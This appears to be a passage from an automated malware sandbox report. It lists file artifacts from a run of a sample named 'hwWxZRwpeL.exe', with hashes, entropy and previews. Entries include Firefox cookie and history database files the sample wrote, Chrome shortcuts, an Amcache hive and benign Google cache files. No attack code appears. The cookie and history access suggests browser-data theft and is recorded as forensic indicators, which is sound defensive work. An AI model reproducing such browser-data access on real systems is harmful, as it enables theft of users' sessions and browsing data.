                                                                                                                                                                                                                                                                                                                                Preview:L..................F.@.. ...$+.,......|.|)..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I\YD.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V\YD.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V\YD.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V\YD............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V\YE............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Oct 28 20:02:10 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2681
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.977639243296586
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:8K81HoddQT90MbSWH1idAKZdA1hehBiZUk1W1qehTxy+C:8n7Py9ly
                                                                                                                                                                                                                                                                                                                                MD5:6E0697FC8E9453DCC544C12F619D944B
                                                                                                                                                                                                                                                                                                                                SHA1:0CDD75E13EB6466EAF7BE4ACC03E07D78E38D50A
                                                                                                                                                                                                                                                                                                                                SHA-256:278A79E34F62C1F5D48D7F014B8BD099E95A30716CB1551A8521350122CD78FD
                                                                                                                                                                                                                                                                                                                                SHA-512:FFD2C14F7F8DB9D86F6FAF70ED73A1FDFE1F3795D02E2E158336C8E8AC5D071485F4648AC2226FA452A8F6A80E1DB279FA054FF1629FBB1E796E366BB7B4EA0D
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:L..................F.@.. ...$+.,.....9..|)..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I\YD.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V\YD.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V\YD.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V\YD............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V\YE............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Oct 28 20:02:09 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2683
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.9861833752279945
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:8XE81HoddQT90MbSWH1idAKZdA1duT+ehOuTbbiZUk5OjqehOuTblxy+yT+:8l7PsT/TbxWOvTb3y7T
                                                                                                                                                                                                                                                                                                                                MD5:0EABB6D6470540068351DA7AF39C9800
                                                                                                                                                                                                                                                                                                                                SHA1:E82FC7AE0ACE81D6646BEBD14331604858B64346
                                                                                                                                                                                                                                                                                                                                SHA-256:80FC459F55BC5EEBAE2D65355DB511453BB3CF28A3772B6E19CAA19EE5375F7E
                                                                                                                                                                                                                                                                                                                                SHA-512:612D58FCDB0A3781463871B1BAC6C7F797206608029B7F8253A35123AFC8569AB8C7C0CF2D597355A95E90AF700CA82A94F61B9CC3B9E80853A9E525B5F6AF2A
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:L..................F.@.. ...$+.,.....0u.|)..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I\YD.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V\YD.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V\YD.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V\YD............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V\YE............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\hwWxZRwpeL.exe
                                                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):32768
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                                                                                                                MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                                                                                                                SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                                                                                                                SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                                                                                                                SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\hwWxZRwpeL.exe
                                                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):32768
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                                                                                                                MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                                                                                                                SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                                                                                                                SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                                                                                                                SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1835008
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.422114808720473
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6144:8Svfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNt0uhiTw:nvloTMW+EZMM6DFyf03w
                                                                                                                                                                                                                                                                                                                                MD5:98321996B1B02A390801DABFDC3E2F21
                                                                                                                                                                                                                                                                                                                                SHA1:F6E481B58EDA033D1B0B6E0BD2FDCA08DCCF2294
                                                                                                                                                                                                                                                                                                                                SHA-256:EE52E01593738AFC48945067E405AAC87D3457F59F901ABCFFD3F20351FC35A9
                                                                                                                                                                                                                                                                                                                                SHA-512:4E0DCAFA8E639C432E5DCE014CAF6E19D1BC6702687792A7033ACF6786D1242E5D9211DDA6A1E209042F0538F4EA30F5127A8A5DCDAD65C3DBA4015111B64724
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:regf?...?....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.[..|)..............................................................................................................................................................................................................................................................................................................................................x...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                Chrome Cache Entry: 480

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (5162), with no line terminators
                                                                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                                                                Size (bytes):5162
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.3503139230837595
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:lXTMb1db1hNY/cobkcsidqg3gcIOnAg8IF8uM8DvY:lXT0TGKiqggdaAg8IF8uM8DA
                                                                                                                                                                                                                                                                                                                                MD5:7977D5A9F0D7D67DE08DECF635B4B519
                                                                                                                                                                                                                                                                                                                                SHA1:4A66E5FC1143241897F407CEB5C08C36767726C1
                                                                                                                                                                                                                                                                                                                                SHA-256:FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
                                                                                                                                                                                                                                                                                                                                SHA-512:8547AE6ACA1A9D74A70BF27E048AD4B26B2DC74525F8B70D631DA3940232227B596D56AB9807E2DCE96B0F5984E7993F480A35449F66EEFCF791A7428C5D0567
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                URL:"https://www.gstatic.com/og/_/ss/k=og.qtm.GZmhE2vV14w.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTuKvZ-nsYNivRzfGpm8QSi6tMFrvg"
                                                                                                                                                                                                                                                                                                                                Preview:.gb_P{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ja{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_Ka{fill:#f9ab00}.gb_F .gb_Ka{fill:#fdd663}.gb_La>.gb_Ka{fill:#d93025}.gb_F .gb_La>.gb_Ka{fill:#f28b82}.gb_La>.gb_Ma{fill:white}.gb_Ma,.gb_F .gb_La>.gb_Ma{fill:#202124}.gb_Na{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3

                                                                                                                                                                                                                                                                                                                                Chrome Cache Entry: 481

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (811)
                                                                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                                                                Size (bytes):816
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.140786685157735
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:SB0gM3x1zfQnCKHxXBHslgT9lCuABuoB7HHHHHHHYqmffffffo:S2gAx1bwHlKlgZ01BuSEqmffffffo
                                                                                                                                                                                                                                                                                                                                MD5:9632BCFD38AC8F95015E58AD234EEBDE
                                                                                                                                                                                                                                                                                                                                SHA1:4C18A6CE50E6A210DA655FEC7BC5E4571AD511E2
                                                                                                                                                                                                                                                                                                                                SHA-256:AFCBFA3310A51C49058C372511ECF599865C8A0052B38B5D2DBDC84C6462AD57
                                                                                                                                                                                                                                                                                                                                SHA-512:7B2A5FA21B594FED98F4DDCDE645614EB53333EB4626D64785C185FDC2A7B5F3CE1CB678DCAFD0789BEB87D02110BBA7C44D97574E0BE5054DFB40E6FBE16E45
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                                                                                                                                                                                Preview:)]}'.["",["chris bey tna injury","target thanksgiving meal deal","rangers recall rempe","tycoon candy store monopoly go rewards","septa workers strike","bold and beautiful spoilers october 28","golden state warriors la clippers","monster hunter wilds open beta test"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]

                                                                                                                                                                                                                                                                                                                                Chrome Cache Entry: 482

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                                                                Size (bytes):29
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.9353986674667634
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                                                                                                                                                                                MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                                                                                                                                                                                SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                                                                                                                                                                SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                                                                                                                                                                SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                                                                                                                                                                                Preview:)]}'.{"update":{"promos":{}}}

                                                                                                                                                                                                                                                                                                                                Chrome Cache Entry: 483

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                                                                Size (bytes):133978
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.4348667744073795
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:1536:g7CkPDNT814TPinWZ12CAkxmSlQWE8waaeeDF47j9RzjixqxUDgRiKvD+RVH2Unp:2P21CAV/WEhFdF47j9Rwqxc6+OUaKszQ
                                                                                                                                                                                                                                                                                                                                MD5:9EA610D6586BCCED5E65F57DF8FB5E17
                                                                                                                                                                                                                                                                                                                                SHA1:BF042BC775B2708BDCD77487A49609C71D9791F8
                                                                                                                                                                                                                                                                                                                                SHA-256:BB153716B68EDD0EF217172787FBD6DD0205A0E3AC2F9827020DD775EEB315C3
                                                                                                                                                                                                                                                                                                                                SHA-512:C66CDA3E7A375A4DBED085A3D67B4688273312572C99F273D5926799D2CF7A6DBB0D80FADEAD0C345C08EC2E041E3F7EDF48122230F0C0DDA217F9EF40CB6DA4
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                                                                                                                                                                                Preview:)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_1d gb_Pe gb_pd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Od\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_jd gb_nd gb_Ed gb_kd\"\u003e\u003cdiv class\u003d\"gb_vd gb_qd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

                                                                                                                                                                                                                                                                                                                                Chrome Cache Entry: 484

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1302)
                                                                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                                                                Size (bytes):117949
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.4843553913091005
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3072:D7yvvjOy7sipKTr3dH39oogNLLDzZzS7oF:D7yjOy7LS39mnhS7oF
                                                                                                                                                                                                                                                                                                                                MD5:A5D33473ED0997C008D1C053E0773EBE
                                                                                                                                                                                                                                                                                                                                SHA1:FEB4CB89145601A0141CC5869BEDF9AE7CD5CB80
                                                                                                                                                                                                                                                                                                                                SHA-256:14C27BB0224FCF89A43B444B427DABE3D0AF184CAA7B6B4990CE228C51AE01C1
                                                                                                                                                                                                                                                                                                                                SHA-512:3C0A48F9FA05469F950D9A268F1B3E9285A783A555EE597A2E203B688EB0FBCAEA3F4DE9BC8F5381C661007D0C6C4AFA70C19B7826D69A0E2A914A55973D14BD
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                URL:"https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0"
                                                                                                                                                                                                                                                                                                                                Preview:gapi.loaded_0(function(_){var window=this;._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([0x800000, ]);.var da,ea,ha,na,oa,sa,ta,wa;da=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};ea=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_.la=ha(this);na=function(a,b){if(b)a:{var c=_.la;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ea(c,a,{configurable:!0,writable:!0,value:b})}};.na("Symbol",function(a){if(a)r

                                                                                                                                                                                                                                                                                                                                Chrome Cache Entry: 485

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (2287)
                                                                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                                                                Size (bytes):173904
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.557015392120516
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3072:mqnrEqzJkt0fv1iYPB+q4hXAmwWiIW14ouj4cCTQdp0K7S1kqUS4exvhb9h59GL0:mqnIqzJkt0fvsYPB+q4hXAmwWVW11uja
                                                                                                                                                                                                                                                                                                                                MD5:07A6DC0B4F6E097C1D0A15202E2529F9
                                                                                                                                                                                                                                                                                                                                SHA1:3F90C96ABF30EE11E87D944BDA7B46F97C105B6C
                                                                                                                                                                                                                                                                                                                                SHA-256:68C28B4DAA8F9DB9762ACB567C6787DA7EBE34F2012BA76239482DC980422C34
                                                                                                                                                                                                                                                                                                                                SHA-512:C8C7FE5696DC1258889D03F988B1A534DE50B0059A243769E258F6A7991ADB3BA2F9079F47E48F453FFD03A3CC3169D5A12F6458A7F04958D17A27D7D5CC3DD3
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                URL:"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.JsvYdB1VlTQ.2019.O/rt=j/m=q_dnp,qmd,qcwid,qapid,qald,qads,q_dg/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/rs=AA2YrTt6VjuqvFHGTQ7vz8QgRv0QbbEJTQ"
                                                                                                                                                                                                                                                                                                                                Preview:this.gbar_=this.gbar_||{};(function(_){var window=this;.try{._.lj=class extends _.Q{constructor(){super()}};.}catch(e){_._DumpException(e)}.try{.var mj,nj,pj,sj,vj,uj,oj,tj;mj=function(a){try{return a.toString().indexOf("[native code]")!==-1?a:null}catch(b){return null}};nj=function(){_.Ka()};pj=function(){oj===void 0&&(oj=typeof WeakMap==="function"?mj(WeakMap):null);return oj};sj=function(a,b){(_.qj||(_.qj=new oj)).set(a,b);(_.rj||(_.rj=new oj)).set(b,a)};.vj=function(a){if(tj===void 0){const b=new uj([],{});tj=Array.prototype.concat.call([],b).length===1}tj&&typeof Symbol==="function"&&Symbol.isConcatSpreadable&&(a[Symbol.isConcatSpreadable]=!0)};_.wj=function(a,b,c,d){a=_.zb(a,b,c,d);return Array.isArray(a)?a:_.Qc};_.xj=function(a,b){a=(2&b?a|2:a&-3)|32;return a&=-2049};_.yj=function(a,b){a===0&&(a=_.xj(a,b));return a|1};_.zj=function(a){return!!(2&a)&&!!(4&a)||!!(2048&a)};_.Aj=function(a,b,c){32&b&&c||(a&=-33);return a};._.Ej=function(a,b,c,d,e,f,g){const h=a.fa;var k=!!(2&b);e=k?

                                                                                                                                                                                                                                                                                                                                Chrome Cache Entry: 486

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                                                                Size (bytes):1660
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.301517070642596
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
                                                                                                                                                                                                                                                                                                                                MD5:554640F465EB3ED903B543DAE0A1BCAC
                                                                                                                                                                                                                                                                                                                                SHA1:E0E6E2C8939008217EB76A3B3282CA75F3DC401A
                                                                                                                                                                                                                                                                                                                                SHA-256:99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
                                                                                                                                                                                                                                                                                                                                SHA-512:462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                URL:https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
